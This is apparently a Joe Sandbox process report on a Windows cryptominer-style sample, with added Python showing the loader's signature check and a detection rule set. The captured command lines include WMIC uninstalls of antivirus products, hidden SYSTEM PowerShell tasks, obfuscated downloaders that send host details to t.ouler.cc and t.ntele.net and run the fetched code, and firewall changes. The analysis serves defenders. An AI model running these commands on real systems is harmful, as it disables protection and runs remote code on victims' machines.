Start time: 18:28:12 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

Analysis Process: WMIC.exe PID: 5216 Parent PID: 1076

General

Start time: 18:28:13 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities

File Written

Analysis Process: cmd.exe PID: 5960 Parent PID: 7148

General

Start time: 18:28:13
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: WMIC.exe PID: 6176 Parent PID: 5960

General

Start time: 18:28:14
Start date: 16/06/2021
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive
Imagebase: 0x7ff6fa870000
File size: 521728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: cmd.exe PID: 2240 Parent PID: 7148

General

Start time: 18:28:14
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: WMIC.exe PID: 6332 Parent PID: 2240

General

Start time: 18:28:15
Start date: 16/06/2021
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive
Imagebase: 0x7ff6fa870000
File size: 521728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: cmd.exe PID: 6172 Parent PID: 7148

General

Start time: 18:28:15
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: WMIC.exe PID: 6796 Parent PID: 6172

General

Start time: 18:28:16
Start date: 16/06/2021
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive
Imagebase: 0x7ff6fa870000
File size: 521728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: cmd.exe PID: 4904 Parent PID: 7148

General

Start time: 18:28:16
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: WMIC.exe PID: 6992 Parent PID: 4904

General

Start time: 18:28:16
Start date: 16/06/2021
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive
Imagebase: 0x7ff6fa870000
File size: 521728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: cmd.exe PID: 4780 Parent PID: 7148

General

Start time: 18:28:17
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: WMIC.exe PID: 7032 Parent PID: 4780

General

Start time: 18:28:17
Start date: 16/06/2021
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive
Imagebase: 0x7ff6fa870000
File size: 521728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: cmd.exe PID: 7048 Parent PID: 7148

General

Start time: 18:28:18
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 1668 Parent PID: 7148

General

Start time: 18:28:20
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 3880 Parent PID: 7148

General

Start time: 18:28:21
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \hOSkYCwoL /F /tr 'powershell -w hidden -c PS_CMD'
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 6132 Parent PID: 968

General

Start time: 18:28:21
Start date: 16/06/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

Analysis Process: conhost.exe PID: 4676 Parent PID: 6132

General

Start time: 18:28:22
Start date: 16/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 5448 Parent PID: 7148

General

Start time: 18:28:25
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn \hOSkYCwoL
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 5756 Parent PID: 7148

General

Start time: 18:28:30
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn RabFBPMZ\r1JNCdQED0 /F /tr 'powershell -w hidden -c PS_CMD'
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 6036 Parent PID: 7148

General

Start time: 18:28:35
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn RabFBPMZ\r1JNCdQED0
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 2804 Parent PID: 968

General

Start time: 18:28:35
Start date: 16/06/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u) {$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/a.jsp?_20210616?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

Analysis Process: conhost.exe PID: 6980 Parent PID: 2804

General

Start time: 18:28:37
Start date: 16/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 5628 Parent PID: 7148

General

Start time: 18:28:41
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO /F /tr 'powershell -w hidden -c PS_CMD'
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 6372 Parent PID: 7148

General

Start time: 18:28:43
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 6620 Parent PID: 968

General

Start time: 18:28:44
Start date: 16/06/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u) {$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+'/a.jsp?_20210616?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
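The two powershell.exe command lines above (PIDs 2804 and 6620) are the same downloader pointed at t.ouler.cc and t.ntele.net. The response is treated as 172 characters of base64 (a 128-byte RSA-1024 signature, $d[0..171]), one separator byte, and the script body from offset 173 onward ($d[173..$c]). RSACryptoServiceProvider.VerifyData with SHA1CryptoServiceProvider is a PKCS#1 v1.5 SHA-1 signature check against the hard-coded modulus, and only a body that passes it reaches IEX. The check protects the operator, not the victim: whoever holds the private key can push new stages through any of the domains, while a sinkholed or hijacked domain cannot feed the loader anything it will run. The Python below is an added example, not code from the report or from the sample: it generates a throwaway key pair (an assumption standing in for the operator's private key), builds a response in the same layout, parses it the way the loader does, and shows that a tampered body or a body signed under the wrong key is rejected, including against the real modulus copied from the command line.

```python
import base64
import hashlib
import random

# RSA public modulus hard-coded in the PowerShell loader above (base64 rejoined
# from the captured command line); the exponent is 0x010001. 128 bytes = RSA-1024.
LOADER_MODULUS_B64 = "xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0="
LOADER_KEY = (int.from_bytes(base64.b64decode(LOADER_MODULUS_B64), "big"), 65537)

SIG_LEN = 128                                        # bytes in an RSA-1024 signature
SIG_B64_LEN = len(base64.b64encode(bytes(SIG_LEN)))  # 172 -> the loader's $d[0..171]
PAYLOAD_OFFSET = SIG_B64_LEN + 1                     # 173 -> $d[173..]; byte 172 is a separator
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # DER prefix used by PKCS#1 v1.5


def _is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin; sufficient for a throwaway demo key, not for production."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (3 << (bits - 2)) | 1  # top two bits set, odd
        if _is_probable_prime(cand, rng):
            return cand


def demo_keypair(seed=20210616):
    """Throwaway RSA-1024 key pair standing in for the operator's key (demo assumption)."""
    rng = random.Random(seed)
    e = 65537
    while True:
        p, q = _gen_prime(512, rng), _gen_prime(512, rng)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return p * q, e, pow(e, -1, phi)


def _emsa_pkcs1_v15_sha1(msg, k):
    """EMSA-PKCS1-v1_5 encoding of SHA-1(msg) to k bytes: 00 01 FF..FF 00 DigestInfo."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(payload, n, d):
    em = int.from_bytes(_emsa_pkcs1_v15_sha1(payload, SIG_LEN), "big")
    return pow(em, d, n).to_bytes(SIG_LEN, "big")


def verify(payload, sig, n, e):
    """Equivalent of RSACryptoServiceProvider.VerifyData(data, SHA1CryptoServiceProvider, sig)."""
    if len(sig) != SIG_LEN:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(SIG_LEN, "big")
    return em == _emsa_pkcs1_v15_sha1(payload, SIG_LEN)


def build_response(payload, n, d):
    """Layout the loader expects from the C2: base64 signature, one separator byte, script body."""
    return base64.b64encode(sign(payload, n, d)) + b"\n" + payload


def loader_accepts(response, n, e):
    """Mirror the loader: $d[0..171] is the signature, $d[173..$c] the body handed to IEX."""
    if len(response) <= PAYLOAD_OFFSET:  # the loader's "$c -gt 173" guard
        return None
    sig = base64.b64decode(response[:SIG_B64_LEN])
    body = response[PAYLOAD_OFFSET:]
    return body if verify(body, sig, n, e) else None


if __name__ == "__main__":
    n, e, d = demo_keypair()
    blob = build_response(b"Write-Host 'stage 2'", n, d)
    print("signed with demo key :", loader_accepts(blob, n, e))
    print("body tampered        :", loader_accepts(blob[:-1] + b"!", n, e))
    print("checked with real key:", loader_accepts(blob, *LOADER_KEY))
```

The prime generation is there only to keep the example free of third-party libraries; the part that matters for an analyst is loader_accepts, which is the exact slicing and verification order of the captured command line, and the last print, which is why replaying or sinkholing the C2 domains yields nothing executable without the operator's private key.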

Analysis Process: conhost.exe PID: 6300 Parent PID: 6620

General

Start time: 18:28:44
Start date: 16/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: cmd.exe PID: 6672 Parent PID: 7148

General

Start time: 18:29:25
Start date: 16/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5840 Parent PID: 6672

General

Start time: 18:29:25
Start date: 16/06/2021
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh.exe firewall add portopening tcp 65529 SDNSd
Imagebase: 0x7ff68a810000
File size: 92672 bytes
MD5 hash: 98CC37BBF363A38834253E22C80A8F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6508 Parent PID: 7148

General

Start time: 18:29:27
Start date: 16/06/2021
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
Imagebase: 0x7ff68a810000
File size: 92672 bytes
MD5 hash: 98CC37BBF363A38834253E22C80A8F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6668 Parent PID: 7148

General

Start time: 18:29:30
Start date: 16/06/2021
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
Imagebase: 0x7ff68a810000
File size: 92672 bytes
MD5 hash: 98CC37BBF363A38834253E22C80A8F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5772 Parent PID: 7148

General

Start time: 18:29:30
Start date: 16/06/2021
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
Imagebase: 0x7ff68a810000
File size: 92672 bytes
MD5 hash: 98CC37BBF363A38834253E22C80A8F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 4244 Parent PID: 7148

General

Start time: 18:29:31
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn blackball /F
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 6176 Parent PID: 7148

General

Start time: 18:29:31
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn t.pp6r1.com /F
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 2464 Parent PID: 7148

General

Start time: 18:29:32
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa2 /F
Imagebase: 0x7ff7dafb0000
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: schtasks.exe PID: 4968 Parent PID: 7148

General

Start time: 18:29:32
Start date: 16/06/2021
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa1 /F
Imagebase:
File size: 226816 bytes
MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
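Read as a whole, the process list above is one tight sequence from a single parent (PID 7148): cmd.exe spawning WMIC "product where ... call uninstall" for a list of AV vendor strings plus a silent Malwarebytes uninstaller, schtasks creating SYSTEM tasks whose action is "powershell -w hidden", netsh opening TCP 65529 and port-proxying it to 1.1.1.1:53, netsh blocking inbound 445 and 135, and schtasks deleting tasks left by earlier or rival installs (blackball, Rtsa1, Rtsa2, t.pp6r1.com). The Python below is an added example and not part of the report: a small rule set run over constructed process-creation records copied from the command lines above (Sysmon event 1 or Security 4688 supplies the same fields), with a per-parent roll-up, because one parent tripping several unrelated rule families is a far stronger signal than any single command. The MITRE technique IDs in the labels are the editor's mapping. The first blackball1 task (no PowerShell action) and the conhost.exe record are included as near-misses that should not fire.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record reduced to the fields the rules need."""
    pid: int
    ppid: int
    cmdline: str


# Task names this sample deletes: leftovers of earlier or rival installs of the same miner.
RIVAL_TASKS = {"blackball", "rtsa1", "rtsa2", "t.pp6r1.com"}


def classify(ev):
    """Return the rule labels an event trips; an empty list means nothing matched."""
    cl = ev.cmdline.lower()
    hits = []
    # WMI-driven uninstall of installed products by name (as seen for Eset, Kaspersky, ...)
    if re.search(r"\bproduct\s+where\b.*\bcall\s+uninstall\b", cl):
        hits.append("T1562.001 wmic_product_uninstall")
    # Vendor uninstaller run with silent switches (unins000.exe /verysilent ...)
    if re.search(r"unins\d*\.exe\b.*?/(very)?silent", cl):
        hits.append("T1562.001 silent_uninstaller")
    # SYSTEM scheduled task whose action is a hidden PowerShell window
    if ("schtasks" in cl and "/create" in cl and "/ru system" in cl
            and "powershell" in cl and "-w hidden" in cl):
        hits.append("T1053.005 system_task_hidden_powershell")
    # Deletion of a task name known from this family's competing installs
    m = re.search(r"/delete\s+/tn\s+(\S+)", cl)
    if m and m.group(1) in RIVAL_TASKS:
        hits.append("rival_miner_task_deleted")
    # netsh portproxy that forwards a local listener to a remote DNS port
    if "portproxy" in cl and "connectport=53" in cl:
        hits.append("T1090 netsh_portproxy_to_dns")
    # Any netsh firewall rule addition (legacy or advfirewall syntax)
    if "netsh" in cl and ("firewall add portopening" in cl
                          or "advfirewall firewall add rule" in cl):
        hits.append("T1562.004 netsh_firewall_change")
    return hits


def scan(events):
    """pid -> labels, for every event that tripped at least one rule."""
    return {ev.pid: hits for ev in events if (hits := classify(ev))}


def score_parents(events):
    """ppid -> distinct labels among its direct children. In this sample the
    parent 7148 collects every rule family, which is the point to alert on."""
    by_parent = defaultdict(set)
    for ev in events:
        by_parent[ev.ppid].update(classify(ev))
    return {ppid: sorted(labels) for ppid, labels in by_parent.items() if labels}


# Constructed sample: command lines and PIDs copied from the process records above.
SAMPLE_EVENTS = [
    ProcEvent(2856, 7148, r"'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive"),
    ProcEvent(6488, 2856, r"wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive"),
    ProcEvent(7048, 7148, r"'C:\Windows\system32\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart"),
    ProcEvent(1668, 7148, r"'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1"),
    ProcEvent(3880, 7148, r"'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \hOSkYCwoL /F /tr 'powershell -w hidden -c PS_CMD'"),
    ProcEvent(6508, 7148, r"'C:\Windows\system32\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53"),
    ProcEvent(6668, 7148, r"'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block"),
    ProcEvent(4244, 7148, r"'C:\Windows\system32\schtasks.exe' /delete /tn blackball /F"),
    ProcEvent(4676, 6132, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for pid, labels in scan(SAMPLE_EVENTS).items():
        print(pid, labels)
    print("per parent:", score_parents(SAMPLE_EVENTS))
```

The substring rules are deliberately loose (case-folded, no tokenising of cmd quoting) because the goal is the roll-up: any one of them fires on legitimate administration now and then, whereas a single parent that uninstalls security products, installs a hidden SYSTEM task, rewires the firewall and removes a named rival task within two minutes does not.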

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond
